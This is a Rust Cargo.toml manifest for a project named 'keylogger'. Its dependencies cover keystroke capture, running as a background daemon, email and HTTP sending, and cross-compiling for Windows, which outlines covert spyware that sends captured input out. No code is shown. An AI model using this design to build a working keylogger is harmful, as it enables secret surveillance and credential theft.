[package]
name = "keylogger"
version = "0.1.0"
edition = "2021"

[dependencies]
daemonize = "0.5.0"
dirs = "5.0.1"
dotenv = "0.15.0"
lettre = "=0.11.10"
rdev = "0.5.3"
reqwest = { version = "0.12.9", features = ["json","blocking"] }
serde = {version = "1.0.215", features = ['derive']}
serde_json = "1.0.133"
tokio = { version = "1.41.1", features = ["full"] }
x11 = "2.20.0"



[target.x86_64-pc-windows-gnu]
linker = "x86_64-w64-mingw32-gcc"
